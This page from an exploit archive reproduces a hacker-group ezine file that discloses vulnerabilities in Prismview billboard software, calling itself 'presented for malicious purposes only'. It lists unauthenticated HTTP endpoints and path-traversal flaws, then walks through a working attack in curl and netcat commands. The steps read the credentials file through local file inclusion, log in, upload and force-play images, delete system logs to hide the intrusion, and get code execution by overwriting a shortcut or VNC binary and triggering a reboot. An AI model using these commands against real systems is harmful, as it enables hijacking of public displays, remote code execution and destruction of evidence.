Registerprismview.txt billboard software
▸▸▸ Exploit & Vulnerability >> papers exploit & ezine vulnerability
Online Vulnerability Scanner Tools
Code...
[09-08-2019] KEK KOMMUNIKATIONS BRINGS YOU... █████ ████ █████ ░░███ ███░ ░░███ ░███ ███ ██████ ░███ █████ █████ ██████ ██████ ░███████ ███░░███ ░███░░███ ███░░ ███░░███ ███░░███ ░███░░███ ░███████ ░██████░ ░░█████ ░███████ ░███ ░░░ ░███ ░░███ ░███░░░ ░███░░███ ░░░░███░███░░░ ░███ ███ █████ ░░████░░██████ ████ █████ ██████ ░░██████ ░░██████ ░░░░░ ░░░░ ░░░░░░ ░░░░ ░░░░░ ░░░░░░ ░░░░░░ ░░░░░░ INNOVATORS IN KEK─BASED TEKNOLOGY EXPERTS IN RESPONSIBLE DISCLOSURE GENERAL ALL-AROUND COOL D00DZ ╔═══════════════╗ ║ prismview.txt ║ ╒═─═─═─═─═─═─═─═─═╩─═─═─═─═─═─═─═─╩═─═─═─═─═─═─═─═─═╕ ┃ This file is presented for malicious purposes ┃ ┃ only. Keksec takes no responsibility for ┃ ┃ the use of the information in this file by ┃ ┃ shit-eating whitehats, or for the patching of ┃ ┃ any vulnerabilities disclosed in this file by ┃ ┃ butthurt SWEs. ┃ ╘═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═╛ Hello?... Are we still live?... Ah, there you are! Our faithful friend! Our fantastic follower! We're very sorry for being gone for so long. Sadly, as with all things, we have weened and waned in and out of existence. Heat has come and gone. Boxes, shells, and exploits too have seen the light of day only to be snuffed out by zealous whitehats. Somehow, despite the religious fervor of the whitehat, our billboard vulns haven't been killed. You shitters really dropped the ball. No, YESCO, telling customers to move boards behind a VPN is *not* a patch. In this file we're dropping the deetz on YESCO's (and now Samsung's) Prismview billboard software. Public Disclosure Timeline: Found: maliciously Contacted vendor: technically Disclosed publicly: affirmatively [KeKSeC]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[KeKSeC] It should first be said that Prismview is a piece of software as well as a company. The company was owned by YESCO, under which it developed the initial Prismview software and was then sold to Samsung. The Prismview software is simply a C# HTTP server which runs on an embedded Windows installation. It handles scheduling for different images as well as diagnostics. These Windows installations also come standard with VNC, AV (usually Mcafee or Kaspersky), and other basic software. Since developing that software Prismview was sold to Samsung and it would seem that they've transitioned to a model similar to Lamar's. We would like to take this time to remind Samsung, again, that shoving your shit behind a VPN does not make it secure. [KeKSeC]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[KeKSeC] In order to control a Prismview billboard, a client program is provided which implements calls to an HTTP API on the YESCO Prismview server (referred to as Prismview from now on). All of these operations occur within the Prismview install directory (%USERPROFILE\Prismview Player), and all directories mentioned from now on are within that directory unless specified otherwise. Here we will go over some endpoints of interest: /AMILOGGEDIN Responds with "OK" if the current IP is logged in or authentication is disabled. We would tell you which endpoints require authentication but, as seems to be the Prismview way, this varies between releases. /PRISMVIEWLOGIN001 Takes two headers, "User" and "Password", and checks if they are equal to the value configured. If so, it adds the requesting IP to a list of logged in users. Returns "OK Password" on success or "OK Password - Not Applicable" if the password was correct but authentication is disabled. /PREPAREFORSPLITFILE Clears the Joiner\ directory. Responds with "OK" on success. /SPLITUPLOAD Takes a multipart octet stream and saves it to the file name specified by the multipart within the Joiner\ directory. Responds "File Uploaded." on success. /SPLITJOIN Reads the file at Joiner\SplitterInfo.xml with the format <FileSplitterJoinerInfoPacket> <OutputPathAndNameUnicoded>../path :^)</OutputPathAndNameUnicoded> <NumberOfFiles>1337</NumberOfFiles> <LastWriteTime>2011-11-11T11:11:11</LastWriteTime> </FileSplitterJoinerInfoPacket> If NumberOfFiles is 3, for example, it will concatenate XferFile.0, XferFile.1, and XferFile.2. It will then write the result of this concatenation to OutputPathAndNameUnicoded within the XFER directory. Doesn't sanitize OutputPathAndNameUnicoded. Responds "OK" on success. /REBOOTSYSTEM Runs the RebootSystem.lnk file in the Prismview directory. /RESTARTPLAYER Runs the RestartPlayer.lnk file in the Prismview directory. /RESTARTVNC Kills all processes with the name "WinVNC" and tries to run the following programs in order with the single argument "-run": C:\Program Files\UltraVNC\WinVNC.exe TightVNC-unstable\WinVNC.exe TightVNC\WinVNC.exe VNC\WinVNC.exe /UPLOAD Takes a multipart octet stream and the file name, creation year, month, day, hour, minute, second, and another option which is simply left as "NA" as comma separated values in HTTP header "prismxfer001". An example is given in the next section. /UPLOAD2 Takes a multipart octet stream and the following HTTP headers: PrismXfer-DestName (base64 encoded upload path) PrismXfer-FileLength PrismXfer-FileLastWriteTimeUTC PrismXfer-MD5Checksum Writes the file to to XFER\. Doesn't sanitize DestName. /VIEWSCREEN.JPG and/or /VIEWSCREENALL.JPG Returns a JPEG screen capture of the running server. /PV9COMMAND Only has to start with /PV9COMMAND. The request path is then split by the character '|' and continues only if the resulting array is larger than 1. The first entry in this resulting array is used as the command, and the rest are arguments. For example, given that you requested the path "/PV9COMMAND|INSTANTPLAY1|image.jpg|99", it would run the INSTANTPLAY1 command with arguments "image.jpg" and "99". Some commands offered are as follows: INSTANTPLAY1|{PATH}|{REPEATS} Plays the image at OperatingMedia/{PATH} REPEATS times on whatever is attached to the Prismview server. Doesn't sanitize PATH. INSTANTPLAY2|{PATH}|{REPEATS} The same as INSTANTPLAY1 except if there is a file at XFER/Media it will copy that file into OperatingMedia prior to playing it. DELETEFILE1|{PATH} Deletes the file at XFER\{PATH}. Doesn't sanitize PATH. CREATEFOLDER|{PATH} Creates a directory at XFER\{PATH}. Again, doesn't sanitize PATH. /../PrismviewV9-Player-006.xml O-oh. If the Prismview server can't find an endpoint to handle a request with, it searches in OperatingMedia/ for the file requested. It doesn't check for LFI and is very stupid. That XML file contains the username and password required to authenticate with the Prismview server. It should also be remembered that the Prismview team was immensely disorganized in creating the Prismview software. Depending on the version, any number of these endpoints will actually exist. Thankfully, the Prismview executable is usually at the same place across version. You can simply use the LFI to download the executable and open it in your favorite C# decompiler. The most obviously broken code is in UserControlWebServer class or one named similarly. There are far more endpoints of course, but we feel this will give you at least some idea as to the workings of Prismview. [KeKSeC]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[KeKSeC] Now we will work you through how a master hacker like yourself might go about finding and exploiting these billboards. Prismview uses the WeOnlyDo C# webserver API, so some early versions use that as their HTTP Server header. Later versions simply use some variation of "Prismview Player". Shodan searches will bring back a few but not many. More can be found with more comprehensive scans of business or 4G IP ranges. You can then find out if authentication is enabled or not by requesting /AMILOGGEDIN. # If authentication is disabled you will see something like this $ curl http://LAME/AMILOGGEDIN OK # If it is enabled, you will see this $ curl http://LAME/AMILOGGEDIN Failed If you see "Failed", don't worry. We can simply use our handy dandy LFI to obtain the Username and Password properties of the configuration file. # Note that the name of this file and possibly its location vary per # release. We leave figuring this out as an exercise for the reader :^) $ echo -e 'GET /../PrismviewV9-Player-006.xml HTTP/1.0\r\n' \ | nc LAME 80 ... <UserName>bkrebs</UserName> <Password>god</Password ... You can then authenticate with the server $ curl -H'User: bkrebs' -H'Password: god' http://LAME/PRISMVIEWLOGIN001 OK Password And use one of the many methods available to upload your image $ mv image.jpg XferFile.0 $ curl -F file=@XferFile.0 http://LAME/SPLITUPLOAD File uploaded. $ echo 'PEZpbGVTcGxpdHRlckpvaW5lckluZm9QYWNrZXQ+CiAgPE91dHB1dFBhdGhB'\ 'bmROYW1lVW5pY29kZWQ+Li4vcGF0aCA6Xik8L091dHB1dFBhdGhBbmROYW1l'\ 'VW5pY29kZWQ+CiAgPE51bWJlck9mRmlsZXM+MTMzNzwvTnVtYmVyT2ZGaWxl'\ 'cz4KICA8TGFzdFdyaXRlVGltZT4yMDExLTExLTExVDExOjExOjExPC9MYXN0'\ 'V3JpdGVUaW1lPgo8L0ZpbGVTcGxpdHRlckpvaW5lckluZm9QYWNrZXQ+Cgo='\ | base64 --decode > SplitterInfo.xml $ curl -F file=@SplitterInfo.xml http://LAME/SPLITUPLOAD File uploaded. $ curl http://LAME/SPLITJOIN OK or $ curl -F file=@image.jpg -H'prismxfer001: 2011,11,11,11,11,11,NA' \ http://LAME/UPLOAD or $ curl -F file=@image.jpg \ -H'PrismXfer-DestName: SEFLS0EgSEFLS0EgSEFLS0E=' \ -H'PrismXfer-FileLength: 632094' -H'PrismXfer-FileLastWriteTimeUTC: 2015-03-03-T00:00:00' \ -H'PrismXfer-MD5Checksum: 07094d279ef4502e07477fa58631113b' \ http://LAME/UPLOAD2 etc. Depending on where you uploaded your image to there are several ways to play it. The laziest would be to refresh the home page and wait until an image is playing with the same file extension as the one you wish to put up. Then you can simply upload your image over that file and it will play the next time the schedule loops around. If you can't find an image with the same extension, just upload the image file to OperatingMedia\ and play it using INSTANTPLAY1. $ curl 'http://LAME/PV9COMMAND|INSTANTPLAY1'\ '|image.jpg'\ '|999999' OK If you're lazy you're done here. If not, you probably want to at least unlink the logs. $ curl 'http://LAME/GETLISTLOGDIRECTORY' ... SystemLog-06-08-37.lg 344 6/8/1337 12:00 AM SystemLog-06-08-37.lg 344 6/9/1337 12:00 AM SystemLog-06-08-37.lg 344 6/10/1337 12:00 AM SystemLog-06-08-37.lg 344 6/11/1337 12:00 AM ... $ curl 'http://LAME/PV9COMMAND|DELETEFILE1|Log\SystemLog-06-08-37.lg' OK Getting code execution is fairly easy as well. Just upload a file to overwrite RebootSystem.lnk in the Prismview directory or any of the WinVNC.exes and then request /REBOOTSYSTEM or /RESTARTVNC to execute it. [KeKSeC]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[KeKSeC] In conclusion, fuck YESCO, fuck Samsung, and fuck Prismview. GLHF <3 keksec [@le_keksec] [le_keksec@protonmail.com] [KeKSeC]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[KeKSeC] greets to thugcrowd and conflict ;-*
Prismview.txt billboard software Vulnerability / Exploit Source : Prismview.txt billboard software
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes